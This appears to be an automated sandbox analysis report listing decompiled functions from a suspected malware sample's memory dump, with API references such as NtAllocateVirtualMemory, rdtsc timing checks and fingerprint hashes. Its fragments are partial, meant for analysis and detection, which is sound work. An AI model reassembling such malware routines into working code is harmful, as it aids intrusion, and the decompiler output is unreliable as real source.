Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A900CF

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A90078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A90086

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00A90048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A90053

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8F9FB

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8F90E

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FAF3

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FADB

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FBC3

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FB73

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FC9B

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FC6B

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FD9A

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FDCB

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FEAB

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FEDB

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A8FFBF

Memory Dump Source

Source File: 0000000A.00000002.2236432476.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000A.00000002.2236424656.0000000000A70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236514361.0000000000B60000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236546024.0000000000B70000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236553249.0000000000B74000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236559170.0000000000B77000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236564582.0000000000B80000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.2236602836.0000000000BE0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408286, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00408286(void* __eax, void* __ecx, void* __edx, intOrPtr* _a4) {
				void* _t11;
				void* _t12;

				_t11 = __ecx - __eax;
				asm("sbb [eax], ebp");
				asm("jecxz 0x79");
				_t12 = E0041B160(__eax, _t11, __edx);
				if(_t12 == 0 || _t12 == 0x33333333) {
					return 0;
				} else {
					return  *_a4 + _t12;
				}
			}

0x00408286
0x00408288
0x0040828a
0x00408298
0x0040829c
0x004082b2
0x004082a6
0x004082ae
0x004082ae

